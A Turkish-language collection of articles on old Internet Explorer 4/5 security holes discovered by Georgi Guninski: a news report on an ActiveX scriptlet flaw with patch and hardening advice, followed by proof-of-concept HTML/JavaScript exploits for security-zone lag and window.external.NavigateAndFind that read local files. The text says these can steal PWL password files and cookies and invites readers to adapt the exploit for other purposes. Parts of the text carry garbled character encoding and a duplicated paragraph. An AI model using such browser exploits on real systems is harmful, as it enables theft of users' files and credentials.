Internet Explorer 5'te büyük
gedik
Gedik büyük
Internet Explorer 5'in tasarımındaki bir hatayla ortaya çıkan büyük güvenlik gediği, Web'de gezen ve e-posta işlemlerini gören kullanıcıların sistemlerini tehlikeye atıyor.
Kimi hacker'lar yazılımlardaki güvenlik gediklerini bulmayı kendi amaçlarını gerçekleştirmek için tercih ederken, kimileri de bir tür "entelektüel tat" babında bu işi yapıyor. Şimdiye kadar poüler yazılımlardaki birçok gediği ortaya çıkarmış Bulgar Georgi Guninski, sanırız ikinci türden bir bilgisayar sevdalısı.
Guninski'nin son keşfi, Internet Explorer 5'teki azımsanmayacak bir güvenlik gediği; ve belki de şimdiye kadar bulduğu gediklerin en ciddisi. Bu gedik sayesinde isteyen herkes birkaç satırlık bir HTML kodunu kullanarak bilgisayar sisteminizin kontrolünü ele geçirebiliyor. Üstelik, böylesi bir kodu içeren bir sayfayı ziyaret ettiğiniz anda, sisteminizi tehlikeye atmış oluyorsunuz.
Sanki bu da yetmezmiş gibi, bu zararlı HTML kodu, bir e-posta mesajının içinde de yer alabiliyor. Dolayısıyla, HTML kodu içeren mesajları görüntüleyebilen Outlook Express, Outlook, Eudora Lite ve Eudora Pro gibi e-posta yazılımları sayesinde, IE 5, "perde arkasında" da harekete geçebiliyor. Kısacası, Web'de gezinmek için Internet Explorer 5'i tercih etmeyenlerden bile olsanız --HTML kodu içeren e-posta mesajları nedeniyle-- sizin de risk kapsamında girme olasılığınız var.
Öte yandan, güvenlik gediği, haber grubu (newsgroup) işlemlerini de IE5 kullanarak gören kullanıcıları da riske atıyor; çünkü, bu gruplardan birine e-posta halinde gönderilen bir mesajın da aynı zararlı HTML kodunu içermesi mümkün.
Guninski'nin ortaya çıkardığı gediğin asıl müsebbibi, IE 5'le birlikte gelen bir ActiveX denetimi. "Object for constructing type libraries for scriplets" adındaki bu ActiveX denetimi scriplet'leri --bir e-posta ya da Web sayfasını görüntülendiğinde çalışan küçük programcıklar-- yaratmak amacıyla var.
İşin garip tarafı, bu denetimin kullanıcının dosya sistemine erişmesinde herhangi bir sınırlama yok; kısacası yaşamsal önemi olan dosyaları silmek ya da Truva atı (trojan) özelliği gösteren virüsleri sisteme sızdırma görevlerini rahatlıkla yüklenebiliyor. Böylece, bu gedik nedeniyle, Windows 95, 98 veya NT tabanlı bir sisteme BO veya BO 2000 gibi zararlı bir programı yerleştirmek --hem de farkına varılmadan-- mümkün.
Microsoft'un geliştirdiği ActiveX, başka programlarca çalıştırılabilen yazılım "bileşenleri" yaratmak için kullanılan bir yordam. Üstelik, ortaya çıkışından bu yana, yeterince güvenli olmadığı iddiasıyla birçok çevrenin eleştirdiği bir özellik.
Microsoft, nihayet bu sorunun üstesinden gelmek için bir yama çıkarmayı başardı. Bu yama, güvenlik gediğine neden olan/olabilecek iki Active X denetiminde, Scriptlet.typlib ve Eyedog'da değişiklik yapıyor. Yamayı kullandığınızda, her iki denetimde de var olan "safe for scripting" (script işlemlerinde güvenli) işareti kalkıyor. Böylece güvenlik gediğinden de kurtulmuş oluyorsunuz. Bu yamayı indirip hem IE 5 hem de IE 4 için kullanabilirsiniz.
Yamayla ve gediklerle ilgili resmi Microsoft açıklamarına göz atmayı da tercih edebilirsiniz.
Eğer bu yamayı kurmamak gibi bir ısrarınız varsa --nedendir bilinmez-- kısmen kurtuluş yöntemlerinden biri de farklı bir Web tarayıcı yazılım (browser) kullanmak. Fakat IE 5 Windows 98'le fazlasıyla bütünleşik bir yazılım olduğu için, başkaca yazılımlar tarafından harekete geçirilebilir. Dolayısıyla, güvenlik gediğine yol açan ActiveX özelliğini devreden çıkarmak daha uygun bir çözüm olarak görünüyor. Bu işi yapmanın en iyi yolları da şunlar:
• Active Desktop'ın "Internet zone" için sunduğu güvenlik değerini, "medium"dan "high"a çıkarın.
• "Script ActiveX controls marked safe for scripting" seçeneğini devreden çıkarın.
• IE'nin Active scripting özelliğini devreden çıkarın.
• Bütün ActiveX denetimlerini ve eklentilerini devreden çıkarın.
Güvenlik için bu adımların hepsini uygulamanız gerek.
rahatlıkla yüklenebiliyor. Böylece, bu gedik nedeniyle, Windows 95, 98 veya NT tabanlı bir sisteme BO veya BO 2000 gibi zararlı bir programı yerleştirmek --hem de farkına varılmadan-- mümkün.
Microsoft'un geliştirdiği ActiveX, başka programlarca çalıştırılabilen yazılım "bileşenleri" yaratmak için kullanılan bir yordam. Üstelik, ortaya çıkışından bu yana, yeterince güvenli olmadığı iddiasıyla birçok çevrenin eleştirdiği bir özellik.
......
Microsoft Internet Explorer Security Zone Settings Lag Güvenlik Açy?y
Çaly?ty?y Sistemler;
Microsoft Internet Explorer 5.5 preview
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000.0
IE penceresinde yeni bir döküman yüklendi?inde IE Security Zone settingsi güncellemiyor. Yani yeni yüklenen pencere üzerinde gereken güvenlik taramasyny yapamyyor. Buda local dosyalaryn yüklenmesini çok kolayla?tyryyor. Hemde uzaktan. Javascript yükleni yapacaklaryny yaptyktan sonra security zone kendini güncelliyor. Ama o zamana kadar zaten biz yapaca?ymyzy yapmy? oluyoruz. HDD de bulunan dosyalary, cookieleri filan full acces almy? oluyoruz.,
Örnek Bir kod....
-----------------img2main.html---------------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Kysa bir text dosyasy yaratyn C:\\test.txt sonrada bu dosyayy okuyun...");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
---------------------------------------------------------------------
----------------img2.html--------------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert(\'Y?te senin dosyan:
\'+opener.document.body.innerText)');alert('Lütfen biraz bekle.')">
</HTML>
---------------------------------------------------------------------
Bir Demo içinde a?a?ydaki sayfaya gidebilirsiniz. Ama önce HDD nizde text.txt diye bir dosya olu?turun C içinde
http://www.nat.bg/~joro/img2main.html
Bu bug Georgi Guninski tarafyndan ke?fedildi PHYTON tarafyndan dilimize uyarlandy.
.......
Internet Explorer 4 veya 5 browserlarında yer alan window.external.NavigateAndFind() fonksiyonu ile uzaktan komuta ederek bağlanan makinedeki bir dosya çalıştırılabiliyor. Bu bugda web dökümanı yükleniyor ve stringte belirtilen aranıyor. Eğer varsa ikinci Frame olarak ekranda gösteriliyor. Bu yolla gizli dökümanlar okunabilir, Pwl dosyaları alınabilir cookies ve local bulunan kullanıcı bilgilerine ulaşılabilir. Bunu herhangi bir web sayfası üzerinden yada html formatında email yada newsgropu mesajı ile kullanılabilir.
Örnek bir exploit:
<IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<SCRIPT>
function f()
{
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
}
setTimeout("f()",2000);
</SCRIPT>
Bu exploitte c:/test.txt dosyası okunuyor ve frame olarak ekrana geliyor. Artık bunu diğer amaçlar için kullanmak kullanıcıya dolayısı ile yazdığı exploite kalıyor...